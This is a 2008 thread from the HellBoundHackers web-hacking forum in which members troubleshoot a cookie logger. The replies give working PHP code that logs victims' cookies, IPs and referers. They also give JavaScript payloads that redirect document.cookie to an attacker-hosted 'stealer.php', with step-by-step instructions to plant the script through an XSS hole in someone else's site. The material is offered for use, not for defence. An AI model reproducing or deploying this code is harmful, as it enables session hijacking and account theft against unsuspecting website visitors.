Follow us on Twitter!
Don't judge the unknown - Grindordie
Thursday, April 24, 2014
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 18
Guests Online: 17
Members Online: 1

Registered Members: 82889
Newest Member: Geriztul
Latest Articles
View Thread

HellBound Hackers | Computer General | Web hacking

Author

Review my cookieLogger


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 05-05-08 21:24
My cookie logger wont work can someone tell me what i am doing wrong..

<?php
$cookie = $HTTP_GET_VARS["cookie"];
$file = fopen('cookielog.txt', 'a'Wink;
fwrite($file, $cookie . "\n\n"Wink;
?>


I save it as cookie.php

<script language="JavaScript">
document.location="http://www.host.com/xboxsomthing1.t35/cookie.php?cookie=" + document.cookie;
</script>


i save it as cook.html and when i try it on myself it doesnt work. all i get in my .txt is blanks.

What am i doing wrong?
Author

RE: Review my cookieLogger

Uber0n
Member



Posts: 1963
Location: Sweden‭‮
Joined: 13.06.06
Rank:
Hacker Level 3
Posted on 05-05-08 21:36
The first thing I see is a weird URL - are you sure this domain name is correct? :right:

Code
http://www.host.com/xboxsomthing1.t35/cookie.php



My recommendation if you want a good cookie logger is WhiteAcid's Community Cookie Logger (CCL).

http://ccl.whitea. . .


img230.imageshack.us/img230/724/uber0nsig3hj6.gif
http://uber0n.web. . .
Nope http://uber0n.webs.com/
Author

RE: Review my cookieLogger


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 05-05-08 22:16
lazydude2000 wrote:
My cookie logger wont work can someone tell me what i am doing wrong..

<?php
$cookie = $HTTP_GET_VARS["cookie"];
$file = fopen('cookielog.txt', 'a');
fwrite($file, $cookie . "\n\n");
?>


I save it as cookie.php

<script language="JavaScript">
document.location="http://www.host.com/xboxsomthing1.t35/cookie.php?cookie=" + document.cookie;
</script>


i save it as cook.html and when i try it on myself it doesnt work. all i get in my .txt is blanks.

What am i doing wrong?



here is mine

<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");;
$referer=getenv ('HTTP_REFERER');
$fp = fopen("cookies.txt", "a");
fwrite($fp, 'Cookie: '.$cookie.'
IP: ' .$ip. ' Date and Time: '
.$date. ' Referer:
'.$referer.'');
fclose($fp);
header ("Location:http://www.falling-midget.t35.com/hacked.html");
?>

that logs the referer the ip the date and the cokie.

your url is so wierd.
try
<script>window.location='http://www.yourstealer.com/stealer.php' + document.cookie</script>



Author

RE: Review my cookieLogger

AldarHawk
Member



Posts: 1690
Location: Canada
Joined: 26.01.06
Rank:
Hacker Level 1
Posted on 05-05-08 22:30
the problem is the txt file does not have write access on it from ALL. do a chmod 777 cookie.txt and you will be good Grin


Just ask Yahoo!Taboo! http://www.erikwestlake.com
Author

RE: Review my cookieLogger


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 05-05-08 22:35
Ok fallingmidget i tried yours

stupid question...when i click on the html i don't get a log but when i click on the php i get a log. Is it supose to do that?


Also i get this, i tried it on t35. so is it working ?

Cookie:
IP: 75.73.180.165 Date and Time: 5 May, 2008, 5:31 pm Referer:
http://freehostcp.t35.com/cp/index.php


I did the chomd thing

sorry for all of the stupid questions



Edited by on 06-05-08 04:14
Author

RE: Review my cookieLogger


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 06-05-08 04:37
Anyone know why i am getting
utmz
utmcsr
utma
Author

RE: Review my cookieLogger

Infam0us
Member



Posts: 153
Location: 0x080484c6
Joined: 06.09.07
Rank:
Apprentice
Posted on 06-05-08 05:39
lazydude2000 wrote:
My cookie logger wont work can someone tell me what i am doing wrong..

<?php
$cookie = $HTTP_GET_VARS["cookie"];
$file = fopen('cookielog.txt', 'a');
fwrite($file, $cookie . "\n\n");
?>


I save it as cookie.php

<script language="JavaScript">
document.location="http://www.host.com/xboxsomthing1.t35/cookie.php?cookie=" + document.cookie;
</script>


i save it as .html and when i try it on myself it doesnt work. all i get in my .txt is blanks.

What am i doing wrong?


First off, change the http://www.host.com/xboxsomthing1.t35/cookie.php
to a site that you are hosting that has php supported. Try t35.com and make a free subdomain. It looks to me like your cookie logger works like this..
1) create a php document and name it cookielogger.php, and inside that php file put
Code
<?php               
$cookie = $HTTP_GET_VARS["cookie"];   
$file = fopen('cookielog.txt', 'a');   
fwrite($file, $cookie . "\n\n");   
?>   



and save it.

2) Make a TEXT file called cookielog.txt, and make it CHMOD 777. That is very important, in other words make it so that it is writable by the cookielogger.php.
3) Now heres where you have to put in work, find an xss hole in a website and insert the script
Code
<script language="JavaScript">               document.location="http://www.yourwebsite.com/cookielogger.php?cookie=" + document.cookie;   
</script>   



This script will redirect whoever see's the page you found the xss hole in to yoursite and will add there cookie to the end of the URL. The php file just takes everything after "?cookie=" and puts it into a variable called $cookie and writes it to the file "cookielog.txt". Hope it helps, if your still confused you can pm me.
Author

RE: Review my cookieLogger


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 06-05-08 06:03
lazydude2000 wrote:
Anyone know why i am getting
utmz
utmcsr
utma


The cookies

__utma
__utmz

...and others are part of Google Analytics (Urchin module) and appear for every site that uses Google Analytics to see how it is being used.


More specifically:

* __utmz tracks where a visitor came from (search engine, search keyword, link)

* __utma tracks each user's amount of visits, first and last visit.

* __utmb and __utmc are used to track when a visit starts and ends. (C expires quickly)

* __utmv is used for custom variables

Credit: http://helpful.knobs-dials.com/index.php/Utma,_utmb,_utmz_cookies


Author

RE: Review my cookieLogger


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 06-05-08 21:35
Ok...

When i click on my html it don't get a cookie but when i click on my php file i get one. Is it suppose to do that because i thought when you click the html it goes to the php then gets the cookie.